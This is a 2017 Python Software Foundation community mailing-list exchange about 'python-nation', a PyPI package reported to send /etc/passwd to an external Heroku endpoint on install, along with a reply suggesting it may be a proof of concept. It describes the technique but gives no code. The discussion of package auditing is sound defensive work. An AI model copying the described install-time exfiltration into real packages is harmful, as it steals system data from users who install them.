Interesting detail, the mentioned package https://pypi.python.org/pypi/python-nation/1.0.1 was created and uploaded by Jacob Kaplan Moss, so I guess this is intended to be a POC, to show PyPI vulnerabilities or some Infosec experiment.On Thu, May 4, 2017 at 8:41 PM, Bruno Rocha <rochacbruno@gmail.com> wrote:Hi,I just read this on reddit[0], a thread asking if PyPI packages are audited and somebody pointed the `python-nation`[1] which is a harmful and useless module, installing itself and sending the `/etc/passwd` content to external endpoint.The app receiving the data is hosted at http://python-nation.herokuapp.com and as the PSF mission [2] saysThe mission of the Python Software Foundation is to promote, protect, and advance the Python programming languageI wonder if there are some workgroup at PSF to handle this? and not only the specific case of `python-nation` which should be deleted and the user banned maybe, But also to handle the audit of other packages?
[0] https://www.reddit.com/r/Python/comments/697da2/does_pyp i_review_code_thats_uploaded/ Cheers,----
_______________________________________________
PSF-Community mailing list
PSF-Community@python.org
https://mail.python.org/mailman/listinfo/psf-community